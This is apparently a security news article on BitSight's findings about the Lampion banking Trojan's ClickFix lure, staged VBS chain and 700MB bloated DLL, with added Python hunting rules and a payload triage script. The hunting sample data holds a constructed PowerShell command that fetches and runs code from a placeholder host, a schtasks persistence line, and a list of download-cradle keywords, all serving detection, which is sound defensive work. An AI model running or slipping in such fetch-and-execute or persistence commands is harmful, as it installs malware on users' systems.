Diagram with the new ClickFix lure | Image: Bitsight Research
Researchers at BitSight have uncovered a long-running spam campaign operated by a Brazilian threat group behind the Lampion banking Trojan, an information-stealing malware family active since 2019. The latest report reveals an updated infection chain, new persistence mechanisms, and a 700MB obfuscated DLL payload, signifying the actor’s commitment to stealth and evasion.
The researchers note that Lampion’s infection flow remains phishing-based, relying on fake Portuguese-language financial emails that trick victims into opening attachments. The chain typically begins with a ZIP file attachment, followed by a sequence of obfuscated Visual Basic scripts (VBS) that culminate in the deployment of a DLL stealer.
Over the past year, the threat actors have refined their methods across three key phases:
- September 2024: switched from download links to direct ZIP attachments.
- December 2024: adopted the ClickFix social engineering lure.
- June 2025: introduced persistence mechanisms in the first-stage script.
BitSight explains, “The group’s infection chain for dropping the stealer has remained similar to previous reports, with phishing emails used as the initial infection vector, followed by a multi-step chain of obfuscated Visual Basic scripts (VBS) that terminates by dropping a DLL into the target system.”
The emails impersonate Portuguese institutions, often mimicking legitimate bank transfer confirmations. Typical subjects include “Proof of transfer”, “Payment receipt follows”, and “Submitting your electronic receipt.”
One of the most striking evolutions in the Lampion campaign is its integration of ClickFix, a deceptive technique that instructs victims to copy and paste malicious commands directly into the Windows “Run” dialog box — effectively tricking users into executing the infection themselves.
The hosted HTML lure claims to provide access to financial documents; the command it tells the victim to paste runs PowerShell, which downloads and executes the first-stage script. Notably, the attackers' ClickFix domains blacklist IP addresses, so requests from flagged addresses, including sandboxes and researchers, break the chain before the next stage is served.
Once the victim executes the malicious VBS, the malware begins its staged delivery process.
- Stage 1: Creates a persistent copy of itself in the Windows Startup folder and schedules future execution tasks.
- Stage 2: Fetches and stores the next VBS stage from attacker-controlled cloud buckets.
- Stage 3: Downloads the final Lampion stealer DLL, establishes persistence, sends telemetry to the C2, and schedules a system reboot to trigger the payload.
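The ClickFix entry point and the staged VBS chain above leave a recognisable trail in process-creation telemetry: a shell spawned from the Run dialog (a child of explorer.exe) that fetches something from the web, a script host running a .vbs out of the Startup folder, and that script host creating tasks and scheduling a reboot. The following hunting rules, run over constructed Sysmon-style records, are an added example and not BitSight's detection content; the field names, the sample paths and URL, and the assumption that the scripts use schtasks.exe and shutdown.exe for task creation and the reboot are this example's choices, not details taken from the report.

```python
"""Hunting rules for the ClickFix entry point and the staged VBS chain.

Added example, not BitSight's detection content. Runs over constructed,
Sysmon-style process-creation records. Field names, sample paths, the URL,
and the use of schtasks.exe / shutdown.exe are assumptions of this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


# Download-cradle fragments typically seen in a pasted ClickFix command.
CRADLE = re.compile(
    r"(iwr\b|invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
    r"invoke-expression|\biex\b|-enc\b|-encodedcommand|curl\b|start-bitstransfer)",
    re.IGNORECASE,
)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\.*\.vbs", re.IGNORECASE)
REBOOT_FLAG = re.compile(r"(^|\s)[/-]r\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_run_dialog(ev: ProcessEvent) -> bool:
    """A shell started from the Run dialog (child of explorer.exe) that pulls
    something from the web: the user has pasted the ClickFix command."""
    return (basename(ev.parent_image) == "explorer.exe"
            and basename(ev.image) in SHELLS
            and CRADLE.search(ev.command_line) is not None)


def startup_folder_script(ev: ProcessEvent) -> bool:
    """Stage 1 persistence: a script host running a .vbs from the Startup folder."""
    return (basename(ev.image) in SCRIPT_HOSTS
            and STARTUP_DIR.search(ev.command_line) is not None)


def script_host_schedules_task(ev: ProcessEvent) -> bool:
    """A VBS creating a scheduled task (assumed to go through schtasks.exe)."""
    return (basename(ev.parent_image) in SCRIPT_HOSTS
            and basename(ev.image) == "schtasks.exe"
            and "/create" in ev.command_line.lower())


def script_host_reboots(ev: ProcessEvent) -> bool:
    """Stage 3 scheduling the reboot that launches the payload (assumed shutdown.exe /r)."""
    return (basename(ev.parent_image) in SCRIPT_HOSTS
            and basename(ev.image) == "shutdown.exe"
            and REBOOT_FLAG.search(ev.command_line) is not None)


RULES = {
    "clickfix_run_dialog": clickfix_run_dialog,
    "startup_folder_script": startup_folder_script,
    "script_host_schedules_task": script_host_schedules_task,
    "script_host_reboots": script_host_reboots,
}


def hunt(events):
    """Return (rule_name, event) for every event matching a rule, in input order."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry: one record per stage of the chain, plus two
# benign records to show the rules stay quiet on ordinary activity.
EXPLORER = r"C:\Windows\explorer.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STARTUP_VBS = (r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\comprovativo.vbs")
SAMPLE_EVENTS = [
    ProcessEvent(POWERSHELL, EXPLORER,
                 'powershell -w hidden -c "iwr http://lure.example.invalid/doc | iex"'),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", EXPLORER, "notepad.exe invoice.txt"),
    ProcessEvent(WSCRIPT, EXPLORER, f'wscript.exe "{STARTUP_VBS}"'),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe", WSCRIPT,
                 f'schtasks.exe /create /sc onlogon /tn Updater /tr "{WSCRIPT} {STARTUP_VBS}"'),
    ProcessEvent(r"C:\Windows\System32\shutdown.exe", WSCRIPT, "shutdown.exe /r /t 300"),
    ProcessEvent(POWERSHELL, EXPLORER, "powershell.exe -NoProfile"),
]

if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"{name:28} {basename(ev.parent_image)} -> {ev.command_line}")
```

The explorer.exe parent is what separates a pasted Run-dialog command from PowerShell launched by an administrator's terminal or a management agent; the benign records in the sample (a plain `-NoProfile` launch and notepad.exe) fall through all four rules.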
BitSight observed that, “The file still contains garbage variables and obfuscated strings, which make the file between 3 and 5MB in size, which after deobfuscation becomes around 35KB.”
This elaborate architecture not only obscures each step but also ensures that the malware survives reboots, complicating forensic response.
The final payload — a single 700MB DLL — represents a major shift in Lampion’s evolution. Unlike earlier versions that downloaded multiple files, the new variant uses a single, self-contained DLL embedding encrypted ZIP archives to evade antivirus scanners that impose file size limits.
BitSight reports, “The stealer now is a single DLL with sizes around 700MB. Using files with large sizes is a common technique known as bloating, whose purpose is to prevent analysis by some tools.”
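Two checks a triage script can run on a bloated payload without handing the whole file to an AV engine are the share of the file that is low-entropy filler (compiled code rarely drops below roughly 5 bits per byte, repeated filler sits near 0) and carving any embedded ZIP archives to list their entries and whether they carry the encryption flag. The block below is an added example and not BitSight's tooling; it builds a constructed sample in memory (a fake header, a high-entropy stand-in for code, 2MB of zero filler, one embedded ZIP, trailing filler), and the sizes and layout are this example's assumptions rather than figures from the report.

```python
"""Triage checks for a bloated payload that embeds ZIP archives.

Added example, not BitSight's tooling. The sample file is constructed in
memory; its sizes and layout are assumptions, not figures from the report.
"""
import io
import math
import zipfile

LOCAL_FILE_HEADER = b"PK\x03\x04"
END_OF_CENTRAL_DIR = b"PK\x05\x06"
CHUNK = 64 * 1024


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte: 0.0 for one repeated value, 8.0 for a flat distribution."""
    n = len(chunk)
    if n == 0:
        return 0.0
    counts = (chunk.count(b) for b in range(256))
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def bloat_ratio(data: bytes, threshold: float = 2.0) -> float:
    """Fraction of CHUNK-sized windows whose entropy is below `threshold`.
    A ratio near 1.0 on a 700MB file says most of it is filler, not code."""
    offsets = range(0, len(data), CHUNK)
    low = sum(1 for off in offsets if shannon_entropy(data[off:off + CHUNK]) < threshold)
    return low / max(1, len(offsets))


def carve_zips(data: bytes):
    """Return (offset, blob) for each embedded archive, cut from a local file
    header to the end of the following end-of-central-directory record
    (22 bytes plus the comment length stored at EOCD+20)."""
    found, pos = [], 0
    while True:
        start = data.find(LOCAL_FILE_HEADER, pos)
        if start < 0:
            break
        eocd = data.find(END_OF_CENTRAL_DIR, start)
        if eocd < 0:
            break
        comment_len = int.from_bytes(data[eocd + 20:eocd + 22], "little")
        end = eocd + 22 + comment_len
        found.append((start, data[start:end]))
        pos = end
    return found


def describe_archive(blob: bytes):
    """(name, uncompressed size, encrypted?) per entry; bit 0 of the general
    purpose flag marks traditional ZIP encryption."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [(i.filename, i.file_size, bool(i.flag_bits & 0x1)) for i in zf.infolist()]


def synthetic_code(n: int) -> bytes:
    """Flat-distribution stand-in for compiled code: a byte permutation whose
    consecutive values never form a ZIP signature, so it cannot fool the carver."""
    return bytes((i * 7919) & 0xFF for i in range(n))


def build_sample(filler_mb: int = 2) -> bytes:
    """Constructed file: header, 128KB of 'code', filler, one ZIP, more filler."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("stage.dll", b"MZ" + b"\x90" * 1024)
        zf.writestr("config.txt", b"c2=203.0.113.10\n")
    header = b"MZ\x90\x00" + b"\x00" * 1020       # stand-in for PE headers
    filler = b"\x00" * (filler_mb * 1024 * 1024)   # the bloat
    return header + synthetic_code(128 * 1024) + filler + buf.getvalue() + b"\x00" * 4096


if __name__ == "__main__":
    sample = build_sample()
    print(f"size={len(sample)} bloat_ratio={bloat_ratio(sample):.2f}")
    for offset, blob in carve_zips(sample):
        print(f"zip at {offset:#x}: {describe_archive(blob)}")
```

On a real sample the carver should be run over a memory-mapped file rather than a bytes object, and the entropy pass is the cheaper first step: if most 64KB windows are filler, the handful of high-entropy windows are where the code and embedded archives sit.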
The sample is Delphi-compiled, VMProtect-obfuscated, and designed to communicate with a C2 server hosted at 83.242.96[.]159, which has been in operation since 2024.
The researchers also found a previously undocumented component dropped by the DLL: a 23MB VBS script that continuously monitors for and terminates web browsers, including Edge, Chrome, Firefox, Opera, and Brave. This is likely an anti-analysis measure intended to stop researchers from examining web-based communication artifacts.
BitSight’s research highlights the multi-layered infrastructure supporting Lampion’s operations. Each stage of the infection process communicates through distinct servers — often cloud-based VPS hosts and storage buckets — that dynamically redirect requests depending on the victim’s IP reputation.
The report notes: “All components of their infrastructure contain IP blacklisting capabilities, which not only make analysis harder by breaking the infection chain, but also because the hosts responsible for blacklisting are also used as redirection points to cloud storage buckets.”
This modular infrastructure allows the operators to swap payloads, servers, or delivery methods quickly, maintaining a steady infection rate while evading blacklists and takedowns.